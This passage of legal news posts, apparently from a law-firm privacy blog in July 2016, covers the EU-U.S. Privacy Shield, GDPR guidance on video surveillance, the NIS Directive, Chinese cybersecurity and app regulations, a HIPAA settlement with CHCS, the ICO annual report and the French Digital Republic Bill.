  • Clear safeguards and transparency obligations on U.S. government access. The European Commission has obtained strong written commitments and assurance from the U.S. government that access to personal data by government authorities for law enforcement, national security and other public interest purposes will be subject to clear conditions, limitations and oversight mechanisms, preventing generalized access and bulk collection of personal data. In addition, a new redress mechanism has been established for EU individuals in the area of national security, through an Ombudsperson within the Department of State. The Ombudsperson will act independently from the U.S. Intelligence Services.
  • Effective protection of individual rights. Individuals who consider that their personal data has been misused under the Privacy Shield framework will benefit from several accessible and affordable dispute resolution mechanisms. These mechanisms include (1) the right for individuals to lodge a complaint directly with the company, (2) free of charge alternative dispute resolution solutions, (3) the right to lodge a complaint with national data protection authorities (the “DPAs”), working in collaboration with the U.S. Federal Trade Commission, and (4) an arbitration mechanism as a last resort.
  • Annual joint review mechanism. The European Commission and the U.S. Department of Commerce will annually monitor the functioning of the Privacy Shield, together with national security experts from the U.S. and European DPAs. The review also will cover the commitments and assurance regarding access to data for law enforcement and national security purposes.

Next Steps

The Adequacy Decision on the protection provided by the Privacy Shield will be notified to the EU Member States today, on July 12, 2016, and will immediately enter into force. In the U.S., the Privacy Shield framework will be published in the Federal Register. Companies will be able to certify with the U.S. Department of Commerce starting August 1, 2016.

The European Commission also will publish a short guide for individuals explaining the available remedies in case an individual thinks that his or her personal data has been misused.

The Article 29 Working Party is currently analyzing the Adequacy Decision in view of its previous Opinion on the Privacy Shield. It will meet on July 25, 2016, to finalize its position on that decision.

Read the European Commission’s Q&A, Factsheet and Press Release.

Read the U.S. Secretary of Commerce’s remarks from the EU-U.S. Privacy Shield Framework Press Conference.

Read the U.S. Department of Commerce’s FAQs, Fact Sheet and Guide on how to join the Privacy Shield.

The Bavarian DPA Issues Paper on Video Surveillance under the GDPR

On July 6, 2016, the Bavarian Data Protection Authority (“DPA”) issued a short paper on video surveillance under the EU General Data Protection Regulation (“GDPR”).

This paper is part of a series of papers that the Bavarian DPA will issue periodically on specific topics of the GDPR to inform the public about what topics are being discussed within the DPA. The DPA emphasized that these papers are non-binding.

The GDPR does not contain specific provisions on video surveillance, contrary to the detailed provisions on video surveillance contained in the German Federal Data Protection Act. Since the GDPR will replace the existing data protection laws in the various EU Member States once it becomes effective in May 2018, the detailed German provisions on video surveillance will cease to exist.

According to the DPA, video surveillance under the GDPR can be legitimized based on the general legal ground of legitimate interest following a balancing test. However, video surveillance will constitute a high-risk processing operation for which a privacy impact assessment (“PIA”) will be necessary, in particular with regard to monitoring publicly accessible areas on a large scale. In addition, appropriate internal records should be kept to document the PIAs as well as the specific data processing activities involved. If a PIA indicates that the processing would result in a high risk that cannot be mitigated (e.g., if mitigation is not technically or practically feasible), the DPA should be consulted prior to the use of the video surveillance system.

According to the DPA, currently, companies are already keeping internal inventories when using video surveillance systems. However, under the GDPR, the DPA advises companies to document each video surveillance system, the purpose of the processing, why it is necessary and proportionate, the risks it presents for individuals and the measures that have been implemented to mitigate those risks.

UK Government Ends NHS Patient Database Scheme

On July 6, 2016, the UK government decided to close its controversial care.data scheme after concerns were raised about the safeguards in place to protect individuals’ health care data and issues with patient transparency.

Under the care.data scheme, all National Health Service (“NHS”) patients’ health care data was held in a central database. The NHS claimed that the program would benefit patients through improved knowledge of drug performance, greater budget efficiencies and an ability to compare regional performance across the UK. Two separate reports reviewing data security generally in the NHS, however, were critical of the safeguards currently in place.

The two reports, one published by Dame Fiona Caldicott, the UK’s National Data Guardian for Health and Care, and the other by the Care Quality Commission, made a number of recommendations to build patient trust, including:

  • a new consent/opt-out model to give people a clear choice about how their personal data is used for purposes outside of their direct care;
  • new data security standards for all organizations handling health and social care information;
  • improved organizational measures, including the provision of training and support to staff, a system of internal audit and external verification and enhanced risk management procedures; and
  • more extensive dialogue with the public about how their information will be used and the benefits of sharing for their own care, for the wider care system and for research purposes.

The care.data scheme was plagued by delays since it was first placed on hold in February 2014, shortly before the first patient records were due to be extracted. While it is unclear whether the NHS will propose an alternative, the UK government has stated its continued aim of realizing the benefits of sharing information.

EU Member States Approve Privacy Shield

On July 8, 2016, EU representatives on the Article 31 Committee approved the final version of the EU-U.S. Privacy Shield (“Privacy Shield”) to permit transatlantic transfers of personal data from the EU to the U.S.

As we previously reported, the Privacy Shield is a successor framework to the Safe Harbor, which was invalidated by the Court of Justice of the European Union in October 2015.

The Article 31 Committee’s approval comes after many months of criticism from various EU bodies of the European Commission’s initial February proposal, including the European Parliament, the Article 29 Working Party and the European Data Protection Supervisor.

Andrus Ansip, Vice President for the Digital Single Market on the European Commission, and Věra Jourová, European Commissioner for Justice, Consumers and Gender Equality, said in a joint statement that “the EU-U.S. Privacy Shield will ensure a high level of protection for individuals and legal certainty for business. It is fundamentally different from the old ‘Safe Harbour’: It imposes clear and strong obligations on companies handling the data and makes sure that these rules are followed and enforced in practice.”

The final seal of approval is expected early next week, with the formal adoption of the Privacy Shield expected on July 12, 2016.

Read Vice President Ansip and Commissioner Jourová’s joint press release.

Second Draft of the Cybersecurity Law Published for Comment in China

On July 5, 2016, the Standing Committee of the National People’s Congress of the People’s Republic of China (the “Standing Committee”) published the full second draft of the Cybersecurity Law (the “second draft”). The publication of the second draft comes after the Standing Committee’s second reading of the draft on June 27, 2016. The public may comment on the second draft of the Cybersecurity Law until August 4, 2016.

The second draft reiterates that network operators should conform to the principles of legality, justice and necessity when collecting personal information, and should expressly inform the data subject of the purpose, method and scope for their collection and use of the information. The second draft also stipulates that network operators are prohibited from providing a user’s personal information to third parties without the user’s consent, except where the personal information is depersonalized in such a way that it cannot identify the individual and the depersonalization cannot be reversed.

The definition of “key information infrastructure” remains unclear in the second draft. According to the second draft, “key information infrastructure” refers to information infrastructure of which damage, malfunction or data leakage would seriously jeopardize national security and the public interest. The State Council will formulate the specific scope of key information infrastructure and the security protection measures for key information infrastructure. Read more information about the second draft.

European Parliament Adopts Directive on Security of Network and Information Systems

On July 6, 2016, the European Parliament adopted the Directive on Security of Network and Information Systems (the “NIS Directive”), which will come into force in August 2016. EU Member States will have 21 months to transpose the NIS Directive into their national laws. The NIS Directive is part of the European Commission’s cybersecurity strategy for the European Union, and is designed to increase cooperation between EU Member States on cybersecurity issues.

The objective of the NIS Directive is to set a common level of security for networks and information systems throughout the European Union. To achieve this objective, EU Member States must:

  • adopt a national strategy on the security of network and information systems;
  • designate a competent authority to monitor the implementation of the NIS Directive; and
  • designate one or more Computer Security Incident Response Team(s).

A cooperation group composed of representatives from EU Member States will be appointed and will work on providing guidance and sharing information on network security.

At the company level, operators of “essential services” and digital service providers will be subject to risk management and incident reporting obligations toward national authorities. Operators of essential services will be identified by EU Member States based on the following criteria: (1) the entity provides a service which is essential for the maintenance of critical societal/economic activities; (2) the provision of that service depends on network and information systems; and (3) a security incident would have significant disruptive effects on the provision of the essential service. The targeted digital service providers include online marketplaces, cloud computing services and search engines.

The sectors in scope of the NIS Directive include energy, transportation, banking, financial markets, health, water and digital infrastructure. The incidents requiring notification will be assessed according to the following factors: number of users affected, duration of incident, geographic spread, the extent of the disruption of the service and the impact on economic and societal activities.

Going forward, the European Commission will adopt implementing acts with respect to security requirements and notifications obligations of digital service providers within one year of the adoption of the NIS Directive.

EU Commission Signs Agreement with Industry on Cybersecurity

On July 5, 2016, the European Commission announced the launch of a new public-private partnership (the “Partnership”) on cybersecurity, as part of its Digital Single Market and EU Cybersecurity strategies. In this context, the European Commission released several documents, including a Commission Decision establishing a contractual arrangement of the new Partnership for cybersecurity industrial research, and a Staff Working Document on the preparation activities for the Partnership.

The Partnership brings together the European Commission and “cybersecurity market players, represented by the European Cyber Security Organisation, as well as members from national, regional and local public administrations, research centers and academia.” These partners are committed to supporting the development and implementation of research and innovation activities of strategic importance to the European Union’s competitiveness and industrial leadership.

The goals of the Partnership are as follows:

  • Build trust among EU Member States and industrial actors by fostering cooperation during the research and innovation process.
  • Help align the supply and demand sectors for cybersecurity products and services.
  • Seek synergies to develop common, sector-neutral technological building blocks with maximum replication potential.

The Partnership will advise the European Commission on cybersecurity aspects of the future work programs under Horizon 2020 (i.e., the financial instrument implementing the Innovation Union, a Europe 2020 flagship initiative aimed at securing Europe’s global competitiveness), and will also act as a discussion platform between the supply and demand sides of cybersecurity products and solutions. In this context, the Partnership will focus on technical priorities that have been defined previously by the industry that include (1) assurance, security and privacy by design, (2) data security, (3) protection of the ICT infrastructure, (4) identity, access and trust management, and (5) cybersecurity services.

Read the European Commission’s Questions and Answers document.

OCR Enters into First Enforcement Action Against Business Associate

On June 30, 2016, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) announced that it had settled potential HIPAA Security Rule violations with Catholic Health Care Services of the Archdiocese of Philadelphia (“CHCS”). This is the first enforcement action OCR has taken against a business associate since the HIPAA Omnibus Rule was enacted in 2013. The HIPAA Omnibus Rule made business associates directly liable for their violations of the HIPAA rules. The settlement with CHCS is also notable because it involved a breach that affected fewer than 500 individuals.

CHCS acts as a business associate by providing management and information technology services to six nursing homes, which are HIPAA-covered entities. In February 2014, the nursing homes reported a breach of electronic protected health information (“ePHI”) involving a stolen iPhone of a CHCS employee. The iPhone contained large amounts of ePHI of nursing home patients, including Social Security numbers, diagnosis and treatment information, names of patients’ family members and legal guardians, and medication information. The iPhone was neither encrypted nor password-protected.

OCR’s investigation of CHCS found that CHCS, in violation of the HIPAA Security Rule, had failed to (1) conduct an accurate and thorough risk assessment involving ePHI, and (2) implement appropriate security measures sufficient to reduce the risks and vulnerabilities to ePHI to a reasonable and appropriate level.

The resolution agreement requires CHCS to pay a $650,000 settlement to OCR and enter into a Corrective Action Plan that obligates CHCS to:

  • conduct an accurate and thorough risk assessment of the potential risks and vulnerabilities to the confidentiality, integrity and availability of ePHI held by CHCS, and document the security measures to reduce those risks and vulnerabilities to ePHI to a reasonable and appropriate level;
  • develop, maintain and implement written policies and procedures to comply with the requirements of the HIPAA Security Rule;
  • distribute the HIPAA policies and procedures to relevant members of its workforce within 14 days after starting their employment, and obtain certification from those workforce members that they agree to comply with the policies and procedures;
  • report any events of noncompliance with its HIPAA policies and procedures;
  • provide copies of its business associate agreements (“BAAs”) and management service agreements to OCR;
  • provide security training to its workforce; and
  • submit annual compliance reports to OCR for a period of two years.

In the press release accompanying the resolution agreement, OCR Director Jocelyn Samuels stated that “[b]usiness associates must implement the protections of the HIPAA Security Rule for the electronic protected health information they create, receive, maintain, or transmit from covered entities.” Director Samuels also referred to an entity’s risk analysis and risk management plan as “the cornerstones of the HIPAA Security Rule.”

Although this is the first OCR enforcement action against a business associate, the CHCS settlement follows two recent actions that involved the failures of covered entities to enter into BAAs with their service providers that used and disclosed PHI. In April 2016, Raleigh Orthopaedic settled with OCR for $750,000 for improperly disclosing PHI to a third-party service provider without entering into a BAA with that service provider, and in March 2016 North Memorial Health Care of Minnesota settled with OCR for $1.55 million in connection with a breach by its service provider, Accretive Health.

Because a sizable percentage of breaches involve business associates, we should expect more enforcement actions against business associates in the near future.

ICO Releases Annual Report for 2015-2016

On June 28, 2016, the UK Information Commissioner’s Office (“ICO”) released its Annual Report for 2015-2016 (the “Report”).

According to the Report, the ICO has dealt with an increase in the number of data protection concerns, handling 16,388 complaints in total. Particularly noteworthy is the £130,000 fine imposed on Pharmacy 2U for breach of the fair processing requirements under the UK Data Protection Act 1998. Pharmacy 2U sold details of over 20,000 customers to a list marketing company without customers’ knowledge or consent.

This past year also has seen a rise in the number of incidents reported by companies under the Privacy and Electronic Communications Regulations (“PECR”). This may, in part, be a consequence of the ICO’s mailing campaign to the top lead generation companies. The ICO issued 17 civil monetary penalties under the PECR totaling £1,985,000 to organizations that engaged in a range of unlawful marketing activities, such as nuisance calls.

Christopher Graham, the UK Information Commissioner, has stressed that during the past year the ICO responded efficiently to unexpected developments, such as the large data breach suffered by TalkTalk, the aftermath of the Schrems decision and its impact on transatlantic data flows, and the consultation regarding the Investigatory Powers Bill in the context of surveillance and security.

The Report highlighted that one of the main challenges for the ICO in the coming years will be to efficiently guide companies in implementing the new EU General Data Protection Regulation and to assess the impact of the UK’s referendum decision to leave the EU on future work in this area.

French Parliament Rejects Data Localization Amendment

On June 30, 2016, a joint committee composed of representatives from both chambers of the French Parliament (“Joint Committee”) reached a common position on the French ‘Digital Republic’ Bill that rejects the data localization amendment previously approved by the French Senate, but significantly amends other aspects of the French Data Protection Act.

No Data Localization Requirement

One of the issues discussed by the Joint Committee was the amendment (corrigendum No. 473) adopted by the French Senate on April 27, 2016. This amendment added a data localization provision to the French Data Protection Act, requiring that personal data be stored in a data center located in the EU and not be transferred outside of the EU. The French Government opposed this amendment, which ignored current and future cross-border data transfer restrictions. Unsurprisingly, the amendment was deleted by the Joint Committee.

Additional Information Requirement

The Joint Committee approved other amendments that anticipate EU General Data Protection Regulation (“GDPR”) requirements. The amendments include the obligation for companies, acting as data controllers, to inform individuals of the data retention period, or if that is not possible, of the criteria used to determine that period. Currently, businesses are not required to specify data retention period(s) in their privacy notices.

Increased Fines

Notably, the ‘Digital Republic’ Bill adopted by the Joint Committee significantly increases the maximum level of fines for violations of the French Data Protection Act. Currently, the French Data Protection Authority (“CNIL”) may impose fines of up to €150,000 for first infringements, or up to €300,000 for repeat infringements. With the new amendment approved by the Joint Committee, the CNIL will be able to impose a fine of up to €3 million immediately, until the GDPR becomes applicable. In this respect, the Joint Committee introduced a new provision to confirm that, as of May 25, 2018, the CNIL will impose the fines prescribed by the GDPR (i.e., depending on the infringement, fines of up to (1) €10 million or 2 percent of annual worldwide turnover, or (2) €20 million or 4 percent of annual worldwide turnover, whichever is higher) to the extent that the data processing falls under the scope of the GDPR. For those data processing activities that will not be subject to the GDPR, the CNIL could impose fines of up to €3 million. In this respect, the French Government will present to the French Parliament, by June 30, 2017, a report on the amendments to the French Data Protection Act made necessary by the entry into force of the GDPR.

Next Steps

The French Digital Republic Bill now needs to be formally adopted by both chambers of the French Parliament.

China Publishes First Regulation Expressly Regulating Mobile Apps

On June 28, 2016, the State Internet Information Office of the People’s Republic of China published the Administrative Provisions on Information Services for Mobile Internet Applications (the “App Administrative Provisions”). This is the first regulation that expressly regulates mobile apps in the People’s Republic of China. Before the App Administrative Provisions were published, the P.R.C. Ministry of Industry and Information Technology had published a draft of the Interim Provisions on the Preinstallation and Management of the Distribution of Mobile Intelligent Terminal Applications (“Interim Provisions”). The comment period for the Interim Provisions draft expired six months ago, and it is still uncertain when it will become effective. According to unofficial statistics, domestic app stores currently have more than 4 million apps in inventory, and the number is growing. Those apps will now become highly regulated products under the App Administrative Provisions.

Most importantly, the App Administrative Provisions expressly requires app providers who provide information services via apps to obtain relevant licenses. Currently, numerous app providers conduct information service businesses without having any license to do so, due to the lack of express laws in this area. With the issuance of the App Administrative Provisions, these app providers will now have to apply for and obtain the relevant licenses, which can include ICP, Internet Culture Operation and/or Internet Publishing Licenses.

The App Administrative Provisions also impose information security obligations on app providers. For example, app providers are now required to authenticate the identity of their registered users according to a principle summarized as “real name authentication at the back end, voluntary authentication at the front end.” Without the user’s consent, an app provider may not collect or use personal information, or enable functions that are closely related to the user’s personal information, such as location, contacts and camera. App providers also may not produce or publish apps that infringe upon the intellectual property of third parties, and are required to keep the log-in records of their apps’ users on file for 60 days.

Internet Application Store Service Providers (“IASS Providers”) are required to supervise app providers’ performance of their obligations. For example, an IASS Provider must file the required information about its app providers with the provincial-level branches of the governmental Internet Information Offices. If an app provider violates its obligations, the IASS Provider is required to adopt the relevant remedial measures and file a report with the relevant government agencies.